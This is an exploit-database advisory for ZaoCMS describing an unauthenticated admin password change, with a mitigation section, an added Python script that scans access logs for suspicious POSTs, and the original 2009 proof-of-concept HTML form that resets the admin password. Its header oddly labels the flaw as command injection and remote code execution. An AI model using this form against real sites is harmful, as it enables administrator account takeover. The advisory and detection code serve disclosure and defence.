Vendor: ZaoCMS
By: ThE g0bL!N
CVSS: 9,3 HIGH
Remote Code Execution
CWE: 78
Product Name: ZaoCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Cod[3] By ThE g0bL!N ZaoCMS Remote Change Password

This exploit allows an attacker to change the password of the admin user in ZaoCMS. The attacker can send a POST request to the user_updated.php page with the username and password parameters set to the desired values. This will allow the attacker to gain access to the admin panel of the CMS.

Mitigation:

Upgrade to the latest version of ZaoCMS and ensure that all user passwords are secure.
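
For sites that cannot upgrade immediately, the access log can be checked for the request described above. The following is an added example, not part of the original advisory or of ZaoCMS: it flags POSTs to the user_updated.php path whose Referer is missing or off-site, as happens when the form is served from somewhere other than the CMS itself. The combined log format, the host name cms.example.test and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Path taken from the form action in the published proof of concept.
TARGET_PATH = "/admin/modules/Users/user_updated.php"

# Apache/nginx "combined" access-log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def suspicious_password_updates(lines, site_hosts):
    """Return POSTs to TARGET_PATH whose Referer is absent or not one of
    site_hosts (lower-case host names of the CMS itself)."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Drop the query string and collapse "//" so padded paths still match.
        path = re.sub(r"/+", "/", m["uri"].split("?", 1)[0])
        if path != TARGET_PATH:
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or ""
        if ref_host is None or ref_host not in site_hosts:
            hits.append({k: m[k] for k in ("ip", "ts", "status", "referer")})
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2009:10:00:01 +0000] "POST /admin/modules/Users/'
    'user_updated.php HTTP/1.1" 200 512 "http://cms.example.test/admin/" "Mozilla/5.0"',
    '198.51.100.7 - - [22/May/2009:10:05:13 +0000] "POST /admin/modules/Users/'
    'user_updated.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [22/May/2009:10:06:40 +0000] "POST //admin/modules/Users/'
    'user_updated.php HTTP/1.1" 200 512 "http://other.example.net/f.html" "Mozilla/5.0"',
    '192.0.2.10 - - [22/May/2009:10:07:02 +0000] "GET /admin/modules/Users/'
    'user_updated.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_password_updates(SAMPLE_LOG, {"cms.example.test"}):
        print(hit["ts"], hit["ip"], hit["status"], hit["referer"])
```

The Referer header is supplied by the client, so hits are leads for triage rather than proof; any hit followed by an admin login from the same address warrants a password reset and a review of the account.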

Exploit-DB raw data:

<form
action="http://demo.zaocms.com/admin/modules/Users/user_updated.php"
method="post" onsubmit="return checkForm(this);" id=form1 Name=form1>
  <h2>Cod[3] By ThE g0bL!N ZaoCMS Remote Change Password
 </h2>
<tittle> ThE g0bL!N</tittle>
   
  <table cellSpacing="0" cellPadding="0" width="100%" border="0">
  <tr><td width="350">
<input type="hidden" name="user_id" value="1" />
  <table cellSpacing="0" cellPadding="0" width="350" class="form_table2"
border="0">
  <tr><td colspan="2" class="grey_bg">
<h4><strong>Contact/Login Info</strong></h4>
  </td></tr><tr><td width="100"
height="20"><strong>Username*</strong></td><td width="100" height="20">
<strong>admin</strong><input name="username" type="hidden"  value="admin"
/>
  </td></tr><tr><td width="100"
height="20"><strong>Password*</strong></td><td width="100" height="20">
<input name="password" type="text" id="password" value="za0" size="20" />
  </td></tr><tr><td width="100" height="20"><strong>Real
Name*</strong></td><td width="100" height="20">
<input name="realname" type="text" value="ZaoCMS Demo Admin" size="20">
  </td></tr>
<tr><td width="100" height="20"><strong>Email</strong><br />
  &nbsp; </td><td width="100" height="20">
    <input name="email" type="text" id="email" value="test@test.com" size="20"
/>
  </td></tr><tr><td width="100" height="20"><strong>Phone</strong></td><td
width="100" height="20">
<p>
 <input type="checkbox" checked="checked" name="is_admin" value="y"
disabled /> Site Administrator Priveleges <p>    
    &nbsp;
  <input type="hidden" name="redir" value="" />
    <input type="submit" value="Save Changes" id="submit" name="submit" 
class="s" />
  </p></td></tr> 

# milw0rm.com [2009-05-22]